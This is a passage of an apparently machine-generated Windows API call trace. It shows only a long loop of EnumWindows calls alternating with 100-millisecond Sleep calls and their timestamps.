EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0155.968] Sleep (dwMilliseconds=0x64) [0155.984] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0155.985] Sleep (dwMilliseconds=0x64) [0155.998] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0155.998] Sleep (dwMilliseconds=0x64) [0156.030] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0156.030] Sleep (dwMilliseconds=0x64) [0156.077] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0156.077] Sleep (dwMilliseconds=0x64) [0156.113] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0156.114] Sleep (dwMilliseconds=0x64) [0156.120] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0156.120] Sleep (dwMilliseconds=0x64) [0156.139] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0156.139] Sleep (dwMilliseconds=0x64) [0156.183] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0156.186] Sleep (dwMilliseconds=0x64) [0156.227] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0156.228] Sleep (dwMilliseconds=0x64) [0156.232] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0156.233] Sleep (dwMilliseconds=0x64) [0156.276] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0156.277] Sleep (dwMilliseconds=0x64) [0156.327] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0156.328] Sleep (dwMilliseconds=0x64) [0156.342] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0156.343] Sleep (dwMilliseconds=0x64) [0156.354] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0156.355] Sleep (dwMilliseconds=0x64) [0156.389] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0156.389] Sleep (dwMilliseconds=0x64) [0156.437] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0156.437] Sleep (dwMilliseconds=0x64) [0156.478] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0156.478] Sleep (dwMilliseconds=0x64) [0156.506] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0156.506] Sleep (dwMilliseconds=0x64) [0156.560] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0156.561] Sleep (dwMilliseconds=0x64) [0156.611] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0156.611] Sleep (dwMilliseconds=0x64) [0156.655] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0156.655] Sleep (dwMilliseconds=0x64) [0156.698] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0156.699] Sleep (dwMilliseconds=0x64) [0156.807] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0156.808] Sleep (dwMilliseconds=0x64) [0156.854] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0156.855] Sleep (dwMilliseconds=0x64) [0156.904] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0156.904] Sleep (dwMilliseconds=0x64) [0157.062] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0157.063] Sleep (dwMilliseconds=0x64) [0157.104] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0157.105] Sleep (dwMilliseconds=0x64) [0157.166] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0157.166] Sleep (dwMilliseconds=0x64) [0157.250] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0157.250] Sleep (dwMilliseconds=0x64) [0157.270] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0157.271] Sleep (dwMilliseconds=0x64) [0157.278] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0157.278] Sleep (dwMilliseconds=0x64) [0157.311] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0157.311] Sleep (dwMilliseconds=0x64) [0157.357] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0157.357] Sleep (dwMilliseconds=0x64) [0157.420] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0157.420] Sleep (dwMilliseconds=0x64) [0157.457] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0157.457] Sleep (dwMilliseconds=0x64) [0157.466] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0157.466] Sleep (dwMilliseconds=0x64) [0157.482] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0157.482] Sleep (dwMilliseconds=0x64) [0157.532] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0157.533] Sleep (dwMilliseconds=0x64) [0157.556] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0157.559] Sleep (dwMilliseconds=0x64) [0157.576] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0157.576] Sleep (dwMilliseconds=0x64) [0157.639] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0157.639] Sleep (dwMilliseconds=0x64) [0157.674] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0157.674] Sleep (dwMilliseconds=0x64) [0157.682] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0157.687] Sleep (dwMilliseconds=0x64) [0157.700] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0157.701] Sleep (dwMilliseconds=0x64) [0157.749] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0157.750] Sleep (dwMilliseconds=0x64) [0157.782] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0157.782] Sleep (dwMilliseconds=0x64) [0157.794] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0157.794] Sleep (dwMilliseconds=0x64) [0157.811] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0157.811] Sleep (dwMilliseconds=0x64) [0157.859] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0157.860] Sleep (dwMilliseconds=0x64) [0157.904] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0157.905] Sleep (dwMilliseconds=0x64) [0157.993] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0157.993] Sleep (dwMilliseconds=0x64) [0158.038] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0158.038] Sleep (dwMilliseconds=0x64) [0158.042] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0158.042] Sleep (dwMilliseconds=0x64) [0158.089] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0158.089] Sleep (dwMilliseconds=0x64) [0158.186] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0158.186] Sleep (dwMilliseconds=0x64) [0158.247] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0158.248] Sleep (dwMilliseconds=0x64) [0158.289] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0158.289] Sleep (dwMilliseconds=0x64) [0158.291] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0158.292] Sleep (dwMilliseconds=0x64) [0158.341] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0158.341] Sleep (dwMilliseconds=0x64) [0158.381] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0158.382] Sleep (dwMilliseconds=0x64) [0158.386] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0158.386] Sleep (dwMilliseconds=0x64) [0158.435] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0158.435] Sleep (dwMilliseconds=0x64) [0158.467] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0158.467] Sleep (dwMilliseconds=0x64) [0158.480] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0158.485] Sleep (dwMilliseconds=0x64) [0158.529] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0158.529] Sleep (dwMilliseconds=0x64) [0158.574] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0158.575] Sleep (dwMilliseconds=0x64) [0158.619] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0158.619] Sleep (dwMilliseconds=0x64) [0158.671] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0158.671] Sleep (dwMilliseconds=0x64) [0158.716] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0158.717] Sleep (dwMilliseconds=0x64) [0158.778] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0158.779] Sleep (dwMilliseconds=0x64) [0158.814] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0158.814] Sleep (dwMilliseconds=0x64) [0158.854] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0158.855] Sleep (dwMilliseconds=0x64) [0158.921] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0158.921] Sleep (dwMilliseconds=0x64) [0159.016] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0159.017] Sleep (dwMilliseconds=0x64) [0159.139] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0159.140] Sleep (dwMilliseconds=0x64) [0159.217] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0159.217] Sleep (dwMilliseconds=0x64) [0159.890] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0159.891] Sleep (dwMilliseconds=0x64) [0160.003] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0160.173] Sleep (dwMilliseconds=0x64) [0160.293] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0160.293] Sleep (dwMilliseconds=0x64) [0160.504] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0160.505] Sleep (dwMilliseconds=0x64) [0160.917] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0160.919] Sleep (dwMilliseconds=0x64) [0161.379] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0161.380] Sleep (dwMilliseconds=0x64) [0162.218] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0162.221] Sleep (dwMilliseconds=0x64) [0163.811] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0163.812] Sleep (dwMilliseconds=0x64) [0164.225] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0164.226] Sleep (dwMilliseconds=0x64) [0164.271] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0164.272] Sleep (dwMilliseconds=0x64) [0164.314] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0164.314] Sleep (dwMilliseconds=0x64) [0164.349] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0164.350] Sleep (dwMilliseconds=0x64) [0164.374] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0164.374] Sleep (dwMilliseconds=0x64) [0164.426] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0164.426] Sleep (dwMilliseconds=0x64) [0164.453] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0164.453] Sleep (dwMilliseconds=0x64) [0164.463] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0164.464] Sleep (dwMilliseconds=0x64) [0164.482] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0164.483] Sleep (dwMilliseconds=0x64) [0164.988] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0164.988] Sleep (dwMilliseconds=0x64) [0165.156] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0165.156] Sleep (dwMilliseconds=0x64) [0165.204] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0165.204] Sleep (dwMilliseconds=0x64) [0165.769] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0165.770] Sleep (dwMilliseconds=0x64) [0165.854] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0165.855] Sleep (dwMilliseconds=0x64) [0166.323] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0166.552] Sleep (dwMilliseconds=0x64) [0166.857] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0166.858] Sleep (dwMilliseconds=0x64) [0167.257] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0167.261] Sleep (dwMilliseconds=0x64) [0167.358] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0167.358] Sleep (dwMilliseconds=0x64) [0167.761] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0167.761] Sleep (dwMilliseconds=0x64) [0168.393] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0168.393] Sleep (dwMilliseconds=0x64) [0168.503] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0168.504] Sleep (dwMilliseconds=0x64) [0169.097] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0169.097] Sleep (dwMilliseconds=0x64) [0169.955] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0169.956] Sleep (dwMilliseconds=0x64) [0170.170] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0170.171] Sleep (dwMilliseconds=0x64) [0170.248] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0170.248] Sleep (dwMilliseconds=0x64) [0170.331] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0170.332] Sleep (dwMilliseconds=0x64) [0170.415] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0170.415] Sleep (dwMilliseconds=0x64) [0170.478] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0170.479] Sleep (dwMilliseconds=0x64) [0170.545] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0170.545] Sleep (dwMilliseconds=0x64) [0170.625] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0170.626] Sleep (dwMilliseconds=0x64) [0170.934] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0170.935] Sleep (dwMilliseconds=0x64) [0171.062] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0171.062] Sleep (dwMilliseconds=0x64) [0171.151] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0171.152] Sleep (dwMilliseconds=0x64) [0171.357] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0171.357] Sleep (dwMilliseconds=0x64) [0171.481] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0171.482] Sleep (dwMilliseconds=0x64) [0171.545] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0171.546] Sleep (dwMilliseconds=0x64) [0171.567] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0171.568] Sleep (dwMilliseconds=0x64) [0171.608] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0171.608] Sleep (dwMilliseconds=0x64) [0171.659] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0171.659] Sleep (dwMilliseconds=0x64) [0171.729] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0171.730] Sleep (dwMilliseconds=0x64) [0171.780] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0171.781] Sleep (dwMilliseconds=0x64) [0171.828] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0171.829] Sleep (dwMilliseconds=0x64) [0171.884] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0171.885] Sleep (dwMilliseconds=0x64) [0171.948] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0171.952] Sleep (dwMilliseconds=0x64) [0172.000] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0172.000] Sleep (dwMilliseconds=0x64) [0172.088] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0172.089] Sleep (dwMilliseconds=0x64) [0172.157] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0172.158] Sleep (dwMilliseconds=0x64) [0172.248] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0172.248] Sleep (dwMilliseconds=0x64) [0172.331] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0172.331] Sleep (dwMilliseconds=0x64) [0172.408] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0172.409] Sleep (dwMilliseconds=0x64) [0172.516] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0172.517] Sleep (dwMilliseconds=0x64) [0172.622] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0172.622] Sleep (dwMilliseconds=0x64) [0172.672] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0172.673] Sleep (dwMilliseconds=0x64) [0172.713] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0172.714] Sleep (dwMilliseconds=0x64) [0172.730] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0172.730] Sleep (dwMilliseconds=0x64) [0172.779] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0172.780] Sleep (dwMilliseconds=0x64) [0172.808] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0172.808] Sleep (dwMilliseconds=0x64) [0172.823] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0172.824] Sleep (dwMilliseconds=0x64) [0172.871] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0172.871] Sleep (dwMilliseconds=0x64) [0172.896] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0172.896] Sleep (dwMilliseconds=0x64) [0172.901] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0172.901] Sleep (dwMilliseconds=0x64) [0172.932] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0172.933] Sleep (dwMilliseconds=0x64) [0172.981] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0172.981] Sleep (dwMilliseconds=0x64) [0173.014] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0173.014] Sleep (dwMilliseconds=0x64) [0173.030] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0173.031] Sleep (dwMilliseconds=0x64) [0173.042] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0173.042] Sleep (dwMilliseconds=0x64) [0173.089] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0173.093] Sleep (dwMilliseconds=0x64) [0173.132] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0173.132] Sleep (dwMilliseconds=0x64) [0173.138] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0173.138] Sleep (dwMilliseconds=0x64) [0173.151] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0173.152] Sleep (dwMilliseconds=0x64) [0173.214] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0173.217] Sleep (dwMilliseconds=0x64) [0173.275] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0173.276] Sleep (dwMilliseconds=0x64) [0173.334] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0173.334] Sleep (dwMilliseconds=0x64) [0173.377] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0173.377] Sleep (dwMilliseconds=0x64) [0173.388] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0173.388] Sleep (dwMilliseconds=0x64) [0173.448] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0173.452] Sleep (dwMilliseconds=0x64) [0173.493] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0173.493] Sleep (dwMilliseconds=0x64) [0173.496] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0173.497] Sleep (dwMilliseconds=0x64) [0173.514] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0173.515] Sleep (dwMilliseconds=0x64) [0173.612] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0173.612] Sleep (dwMilliseconds=0x64) [0173.666] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0173.671] Sleep (dwMilliseconds=0x64) [0173.735] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0173.736] Sleep (dwMilliseconds=0x64) [0173.794] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0173.794] Sleep (dwMilliseconds=0x64) [0173.811] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0173.811] Sleep (dwMilliseconds=0x64) [0173.859] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0173.859] Sleep (dwMilliseconds=0x64) [0173.939] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0173.939] Sleep (dwMilliseconds=0x64) [0173.996] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0173.997] Sleep (dwMilliseconds=0x64) [0174.060] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0174.060] Sleep (dwMilliseconds=0x64) [0174.141] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0174.141] Sleep (dwMilliseconds=0x64) [0174.197] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0174.200] Sleep (dwMilliseconds=0x64) [0174.286] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0174.286] Sleep (dwMilliseconds=0x64) [0174.340] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0174.341] Sleep (dwMilliseconds=0x64) [0174.390] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0174.390] Sleep (dwMilliseconds=0x64) [0174.434] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0174.435] Sleep (dwMilliseconds=0x64) [0174.536] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0174.537] Sleep (dwMilliseconds=0x64) [0174.651] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0174.652] Sleep (dwMilliseconds=0x64) [0174.748] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0174.749] Sleep (dwMilliseconds=0x64) [0175.300] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0175.301] Sleep (dwMilliseconds=0x64) [0175.417] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0175.417] Sleep (dwMilliseconds=0x64) [0175.543] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0175.544] Sleep (dwMilliseconds=0x64) [0175.711] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0175.711] Sleep (dwMilliseconds=0x64) [0175.791] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0175.810] Sleep (dwMilliseconds=0x64) [0176.058] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0176.081] Sleep (dwMilliseconds=0x64) [0176.143] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0176.144] Sleep (dwMilliseconds=0x64) [0176.246] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0176.247] Sleep (dwMilliseconds=0x64) [0176.486] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0176.486] Sleep (dwMilliseconds=0x64) [0176.573] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0176.573] Sleep (dwMilliseconds=0x64) [0176.665] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0176.666] Sleep (dwMilliseconds=0x64) [0176.758] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0176.759] Sleep (dwMilliseconds=0x64) [0177.127] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0177.128] Sleep (dwMilliseconds=0x64) [0177.186] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0177.186] Sleep (dwMilliseconds=0x64) [0177.249] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0177.249] Sleep (dwMilliseconds=0x64) [0177.362] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0177.362] Sleep (dwMilliseconds=0x64) [0177.414] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0177.415] Sleep (dwMilliseconds=0x64) [0177.478] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0177.482] Sleep (dwMilliseconds=0x64) [0177.535] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0177.536] Sleep (dwMilliseconds=0x64) [0177.546] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0177.546] Sleep (dwMilliseconds=0x64) [0177.560] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0177.561] Sleep (dwMilliseconds=0x64) [0177.597] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0177.598] Sleep (dwMilliseconds=0x64) [0177.640] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0177.640] Sleep (dwMilliseconds=0x64) [0177.652] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0177.656] Sleep (dwMilliseconds=0x64) [0177.667] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0177.667] Sleep (dwMilliseconds=0x64) [0177.698] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0177.698] Sleep (dwMilliseconds=0x64) [0177.748] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0177.749] Sleep (dwMilliseconds=0x64) [0177.776] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0177.776] Sleep (dwMilliseconds=0x64) [0177.796] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0177.797] Sleep (dwMilliseconds=0x64) [0177.838] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0177.839] Sleep (dwMilliseconds=0x64) [0177.869] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0177.873] Sleep (dwMilliseconds=0x64) [0177.886] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0177.886] Sleep (dwMilliseconds=0x64) [0177.924] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0177.925] Sleep (dwMilliseconds=0x64) [0178.020] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0178.021] Sleep (dwMilliseconds=0x64) [0178.038] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0178.038] Sleep (dwMilliseconds=0x64) [0178.041] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0178.042] Sleep (dwMilliseconds=0x64) [0178.073] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0178.073] Sleep (dwMilliseconds=0x64) [0178.132] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0178.133] Sleep (dwMilliseconds=0x64) [0178.154] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0178.155] Sleep (dwMilliseconds=0x64) [0178.169] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0178.169] Sleep (dwMilliseconds=0x64) [0178.207] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0178.208] Sleep (dwMilliseconds=0x64) [0178.251] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0178.251] Sleep (dwMilliseconds=0x64) [0178.300] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0178.300] Sleep (dwMilliseconds=0x64) [0178.343] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0178.343] Sleep (dwMilliseconds=0x64) [0178.388] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0178.388] Sleep (dwMilliseconds=0x64) [0178.431] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0178.432] Sleep (dwMilliseconds=0x64) [0178.486] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0178.486] Sleep (dwMilliseconds=0x64) [0178.525] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0178.529] Sleep (dwMilliseconds=0x64) [0178.565] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0178.565] Sleep (dwMilliseconds=0x64) [0178.575] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0178.575] Sleep (dwMilliseconds=0x64) [0178.589] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0178.589] Sleep (dwMilliseconds=0x64) [0178.639] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0178.639] Sleep (dwMilliseconds=0x64) [0179.280] EnumWindows 